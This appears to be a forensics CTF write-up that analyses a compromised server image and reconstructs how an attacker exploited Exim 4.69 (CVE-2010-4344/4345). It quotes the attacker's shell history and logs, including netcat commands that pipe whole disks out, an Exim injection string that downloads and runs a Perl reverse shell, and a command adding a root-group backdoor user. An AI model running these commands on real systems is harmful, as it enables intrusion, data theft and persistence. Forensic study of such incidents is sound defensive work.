The vulnerability that opened the door
CTF challenge about a system intrusion
An acquaintance has provided us with a disk image of a server that he considers to be “is doing strange things”. From the INCIBE laboratory, we have seen that there was “something strange” with some program. We need a second opinion from an expert.
Can you help us identify the vulnerable application?
- File:
- Password: Gr33n2015##
Table of Contents
- Extracting the zip
- Mount the image
- Analyze command history
- Analyzing malicious application
- Corrupted logs
1- Extracting the zip
Download and extract it using the provided password
2- Mount the image
It extracts an image, we will mount this image in a folder to see what it contains.
mkdir disco
sudo mount discoS.img disco
3- Analyze command history
Previously we were told that this system image has something strange, it may be something malicious, for this we will check if they accessed the root user and if so we can see what commands they executed as administrator user.
cat root/.bash_history
What did the attacker do as an administrator?
1- Removes the exim program from the system
apt-get remove exim4
apt-get remove exim4-base
apt-get remove exim4-daemon-light
dpkg -l | grep exim
apt-get remove exim4-config
dpkg --purge
apt-get remove exim
dpkg -l | grep exim
2- Check in which path it is located, create a folder called exim4 and open it.
mkdir exim4
cd exim4/
3- With the command scp copy all files via ssh from the attacker’s host to the new folder
scp yom@* .
4- Install the vulnerable exim packages that were downloaded from your machine remotely.
dpkg -i exim4_4.69-9_all.deb
dpkg -i --ignore-depends=exim4-base,exim4-daemon-light exim4_4.69-9_all.deb
dpkg -i exim4-base_4.69-9_i386.deb
dpkg -i exim4-config_4.69-9_all.deb
dpkg -i exim4-base_4.69-9_i386.deb
dpkg -i exim4-daemon-light_4.69-9_i386.deb
5- Once all vulnerable packages are installed, exit the folder and delete it.
cd ..
rm -rf exim4/
6- Stops all CPU operations with the halt command.
7- Install the OpenSSH program to encrypt connections over the network (alternative to SSH).
apt-get install openssh-server
apt-get install openssh-server
8- Configure the vulnerable mail server and reboot the system.
cd /etc/exim4/
vi update-exim4.conf.conf
9- Find the paths to the gcc, memdump binaries.
whereis gcc
whereis memdump
apt-get install memdump
10- Check if he have a connection to your machine within the network.
11- Stealing data
sudo dd if=/dev/sda | nc 4444
dd if=/dev/sda | nc 4444
dd if=/dev/sda1 | nc 4444
12- Retrieving transferred data
apt-get install ddrescue
apt-get install dcfldd
4- Analyzing malicious application
We have already seen that the malicious application is exim, a mail transfer service.
Exim version 4.69 contains a critical vulnerability.
Discovered in 2011, it was one of the main causes of botnets at the time.
By sending a specially crafted message, an attacker can corrupt the heap and execute arbitrary code with the privileges of the Exim user (CVE-2010-4344) causing buffer overflow.
That is why this system failure was so serious, bringing together an RCE and an LPE and causing such a disaster.
- RCE: CVE-2010-4344
- LPE: CVE-2010-4345
Exploits and more info: EXIM 4.69 RCE
I leave a video of how to exploit this security flaw, using a metasploit module:
5- Corrupted Logs
Once we know how all this happened we look at the logs, which was the main source of exploitation.
ls var/log/exim4
Buffer Overflow log:
cat var/log/exim4/rejectlog
He tried to download the file by performing the overflow and one of the requests was successful, once the perl file was downloaded from his attacker’s machine, he placed it in tmp as user exim and executed it as that user.
cat var/log/exim4/mainlog
This perl binary performs a socket connection creating a remote session from the victim computer to the attacker.
${run{/bin/sh -c "exec /bin/sh -c 'wget -O /tmp/;perl /tmp/ 4444; sleep 1000000'"}}
Perl exploit that performs a reverse shell to the computer (exploit that runs in exim to connect to the computer remotely as root user):
The way in which the attacker was connected
cat var/log/exim4/mainlog
Create a new user that is in the admin group with an md5 hashed password.
How to become root
${run{/bin/sh -c "exec /bin/sh -c 'useradd --gid root --create-home --password 0 0mkpasswd -H md5 Ulyss3s) ulysses'"}}
In tmp we can see how the file is c.perl (which generated that connection), and a compressed file named rk.tar
Analyzing the rk file, we realize that it is a rootkit, which generates a backdoor to the system using iptables and so on.